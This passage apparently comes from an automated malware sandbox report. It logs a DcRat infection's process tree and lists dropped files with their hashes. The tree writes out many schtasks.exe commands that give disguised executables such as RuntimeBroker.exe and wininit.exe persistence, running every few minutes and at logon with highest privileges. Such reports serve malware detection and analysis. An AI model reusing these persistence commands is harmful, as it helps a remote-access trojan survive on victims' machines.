                                                schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\backgroundTaskHost.exe'" /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3244
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1344
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4236
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskhostw.exe'" /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1900
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskhostw.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2784
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Program Files\Reference Assemblies\Microsoft\taskhostw.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3728
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dwm.exe'" /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3472
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dwm.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4644
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dwm.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4192
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2460
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2272
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:840
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\wininit.exe'" /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3100
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\wininit.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2156
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\wininit.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:232
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 14 /tr "'C:\Windows\Web\Wallpaper\Theme1\browserwinsvc.exe'" /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4776
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "browserwinsvc" /sc ONLOGON /tr "'C:\Windows\Web\Wallpaper\Theme1\browserwinsvc.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1616
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 7 /tr "'C:\Windows\Web\Wallpaper\Theme1\browserwinsvc.exe'" /rl HIGHEST /f
                                                1⤵
                                                • DcRat
                                                • Process spawned unexpected child process
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2192
                                              • C:\Windows\system32\msiexec.exe
                                                C:\Windows\system32\msiexec.exe /V
                                                1⤵
                                                • Blocklisted process makes network request
                                                • Enumerates connected drives
                                                • Drops file in Program Files directory
                                                • Drops file in Windows directory
                                                • Modifies data under HKEY_USERS
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:2808
                                                • C:\Windows\System32\MsiExec.exe
                                                  C:\Windows\System32\MsiExec.exe -Embedding 74105C9CF0DB293987C401332B9D3FED
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:1528
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding A984EA88B7F3479AB8C8148B7D8DA946
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:2392
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 11727FA763B826A2E22F61BCD5FCC112 E Global\MSI0000
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:4092
                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                    3⤵
                                                      PID:4796
                                                      • C:\Windows\System32\wevtutil.exe
                                                        "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                        4⤵
                                                          PID:3196
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Surrogateprovidercomponentsessionmonitor\upfc.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1852
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Surrogateprovidercomponentsessionmonitor\upfc.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1180
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Surrogateprovidercomponentsessionmonitor\upfc.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1684
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\msiexec.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5056
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\msiexec.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:3472
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\Windows\GameBarPresenceWriter\msiexec.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2584
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\VLC\lua\playlist\RuntimeBroker.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1984
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\lua\playlist\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2964
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\lua\playlist\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2784
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1264
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4540
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2380
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 13 /tr "'C:\Surrogateprovidercomponentsessionmonitor\TrustedInstaller.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2452
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Surrogateprovidercomponentsessionmonitor\TrustedInstaller.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4168
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 9 /tr "'C:\Surrogateprovidercomponentsessionmonitor\TrustedInstaller.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:468
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\locale\RuntimeBroker.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4264
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\locale\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5084
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\locale\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2252
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\SendTo\wininit.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4068
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\wininit.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1360
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\SendTo\wininit.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4936
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'" /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2040
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1940
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'" /rl HIGHEST /f
                                                    1⤵
                                                    • DcRat
                                                    • Process spawned unexpected child process
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5016
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:1940
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:2192

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Config.Msi\e57546c.rbs

                                                        Filesize

                                                        1.0MB

                                                        MD5

                                                        d41e48bd3b10094d3b07c3e78cd9232f

                                                        SHA1

                                                        82733566144530abb8080b2a2d0db713269453a9

                                                        SHA256

                                                        2009003f551aa8a5be7472507ba78db34e25ec96b2b02baa64893725f81fe51d

                                                        SHA512

                                                        17192e8c8888619dab201f5e8633966b6c2de31c5e5e055598ba5db9c415a50b19feba8f72409ca83f9fcf734f02606e493dbe3a68607206dcebbdf1563bae7b

                                                      • C:\Program Files\nodejs\node_etw_provider.man

                                                        Filesize

                                                        10KB

                                                        MD5

                                                        1d51e18a7247f47245b0751f16119498

                                                        SHA1

                                                        78f5d95dd07c0fcee43c6d4feab12d802d194d95

                                                        SHA256

                                                        1975aa34c1050b8364491394cebf6e668e2337c3107712e3eeca311262c7c46f

                                                        SHA512

                                                        1eccbe4ddae3d941b36616a202e5bd1b21d8e181810430a1c390513060ae9e3f12cd23f5b66ae0630fd6496b3139e2cc313381b5506465040e5a7a3543444e76

                                                      • C:\Program Files\nodejs\node_etw_provider.man

                                                        Filesize

                                                        8KB

                                                        MD5

                                                        d3bc164e23e694c644e0b1ce3e3f9910

                                                        SHA1

                                                        1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                        SHA256

                                                        1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                        SHA512

                                                        91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                        Filesize

                                                        818B

                                                        MD5

                                                        2916d8b51a5cc0a350d64389bc07aef6

                                                        SHA1

                                                        c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                        SHA256

                                                        733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                        SHA512

                                                        508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        5ad87d95c13094fa67f25442ff521efd

                                                        SHA1

                                                        01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                        SHA256

                                                        67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                        SHA512

                                                        7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                        Filesize

                                                        754B

                                                        MD5

                                                        d2cf52aa43e18fdc87562d4c1303f46a

                                                        SHA1

                                                        58fb4a65fffb438630351e7cafd322579817e5e1

                                                        SHA256

                                                        45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                        SHA512

                                                        54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                        Filesize

                                                        771B

                                                        MD5

                                                        e9dc66f98e5f7ff720bf603fff36ebc5

                                                        SHA1

                                                        f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                        SHA256

                                                        b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                        SHA512

                                                        8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                        Filesize

                                                        730B

                                                        MD5

                                                        072ac9ab0c4667f8f876becedfe10ee0

                                                        SHA1

                                                        0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                        SHA256

                                                        2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                        SHA512

                                                        f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        d116a360376e31950428ed26eae9ffd4

                                                        SHA1

                                                        192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                        SHA256

                                                        c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                        SHA512

                                                        5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                        Filesize

                                                        802B

                                                        MD5

                                                        d7c8fab641cd22d2cd30d2999cc77040

                                                        SHA1

                                                        d293601583b1454ad5415260e4378217d569538e

                                                        SHA256

                                                        04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                        SHA512

                                                        278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                        Filesize

                                                        16KB

                                                        MD5

                                                        bc0c0eeede037aa152345ab1f9774e92

                                                        SHA1

                                                        56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                        SHA256

                                                        7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                        SHA512

                                                        5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

                                                        Filesize

                                                        780B

                                                        MD5

                                                        b020de8f88eacc104c21d6e6cacc636d

                                                        SHA1

                                                        20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                        SHA256

                                                        3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                        SHA512

                                                        4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

                                                        Filesize

                                                        763B

                                                        MD5

                                                        7428aa9f83c500c4a434f8848ee23851

                                                        SHA1

                                                        166b3e1c1b7d7cb7b070108876492529f546219f

                                                        SHA256

                                                        1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                        SHA512

                                                        c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

                                                        Filesize

                                                        4KB

                                                        MD5

                                                        f0bd53316e08991d94586331f9c11d97

                                                        SHA1

                                                        f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

                                                        SHA256

                                                        dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

                                                        SHA512

                                                        fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

                                                        Filesize

                                                        771B

                                                        MD5

                                                        1d7c74bcd1904d125f6aff37749dc069

                                                        SHA1

                                                        21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

                                                        SHA256

                                                        24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

                                                        SHA512

                                                        b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                                                        Filesize

                                                        84B

                                                        MD5

                                                        0c3d77c634f46e5a1d3398b486342e3a

                                                        SHA1

                                                        1febe77346a037027ba1fc2fe073c7c93418f0be

                                                        SHA256

                                                        b4b0b4057df774b1a33706cc4c57884681197e3edeffd4afdbf37be974f8f828

                                                        SHA512

                                                        15613e036214ce79048916b2bba4e9db76c1250d55f6c5a43ca54878aaade6313c5b3a90a37f9a2c7870c25481d512d4de2b6c14906823ec7926274c0e0ff260

                                                      • C:\Surrogateprovidercomponentsessionmonitor\GPEuaUZk.bat

                                                        Filesize

                                                        63B

                                                        MD5

                                                        6de687cf7ca366429c953cb49905b70a

                                                        SHA1

                                                        58e2c1823c038d8da8a2f042672027184066279e

                                                        SHA256

                                                        80d02a1cb8e68ffbc609a6c4914600604153ce929d46994200f837d354a5a611

                                                        SHA512

                                                        6bfa7a07d6adf167458cece0ba3a110479ee7677feb58c0ae9ba5c8913bcdda13664060ce0261abc1668c18831d5c73f6bc570be8595323d46704b810fc024ef

                                                      • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe

                                                        Filesize

                                                        1.5MB

                                                        MD5

                                                        037a82f24f4cddb5c5c5cdd21a64f307

                                                        SHA1

                                                        a310eecaa57af7cd61ba38805acba246c433b479

                                                        SHA256

                                                        3829c70319b18efdd69f5f8d0d7b5c5855c29f7c5b7395f5a82bf53c8988624b

                                                        SHA512

                                                        b7d9604ce79f1d56ea6c221aade92b0492e737384c5604b134587edf08c13d163539c5f2864864e3d7b50e6cb4f75975ab6a7a715f849e961442a05ee0280bcc

                                                      • C:\Surrogateprovidercomponentsessionmonitor\oIWytMk.vbe

                                                        Filesize

                                                        225B

                                                        MD5

                                                        391a96335b25ba0a8cebdf4628d737cf

                                                        SHA1

                                                        3b81d5ba63397e5e542bf8090888c4b6f8037e92

                                                        SHA256

                                                        835d12603e51f2c557699e79109d011a01b72e3041c566e3422602f172eda58f

                                                        SHA512

                                                        47b74d5cd5adba289dde01fea763267d73468555da6d6d366b76590454481072bc3c2362765e3c6af6155c8f9e54fad0a53118f75eae78ff24ffee0046b5583c

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\browserwinsvc.exe.log

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        c6ecc3bc2cdd7883e4f2039a5a5cf884

                                                        SHA1

                                                        20c9dd2a200e4b0390d490a7a76fa184bfc78151

                                                        SHA256

                                                        b3d90663a46ee5333f8f99df4d43c0c76bf3902e3ba3ab36c0903027176d340d

                                                        SHA512

                                                        892a8f8e50ff350e790e1543032c64b3e1c050198b1810f89b6ce8a23de947a3e8299e880f0e79da7e4b5373a6b95e7dd7814cd5d7406a1553ef104ff2ff091e

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                        SHA1

                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                        SHA256

                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                        SHA512

                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                        Filesize

                                                        152B

                                                        MD5

                                                        c39b3aa574c0c938c80eb263bb450311

                                                        SHA1

                                                        f4d11275b63f4f906be7a55ec6ca050c62c18c88

                                                        SHA256

                                                        66f8d413a30451055d4b6fa40e007197a4bb93a66a28ca4112967ec417ffab6c

                                                        SHA512

                                                        eeca2e21cd4d66835beb9812e26344c8695584253af397b06f378536ca797c3906a670ed239631729c96ebb93acfb16327cf58d517e83fb8923881c5fdb6d232

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                        Filesize

                                                        152B

                                                        MD5

                                                        dabfafd78687947a9de64dd5b776d25f

                                                        SHA1

                                                        16084c74980dbad713f9d332091985808b436dea

                                                        SHA256

                                                        c7658f407cbe799282ef202e78319e489ed4e48e23f6d056b505bc0d73e34201

                                                        SHA512

                                                        dae1de5245cd9b72117c430250aa2029eb8df1b85dc414ac50152d8eba4d100bcf0320ac18446f865dc96949f8b06a5b9e7a0c84f9c1b0eada318e80f99f9d2b

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                        Filesize

                                                        265B

                                                        MD5

                                                        f5cd008cf465804d0e6f39a8d81f9a2d

                                                        SHA1

                                                        6b2907356472ed4a719e5675cc08969f30adc855

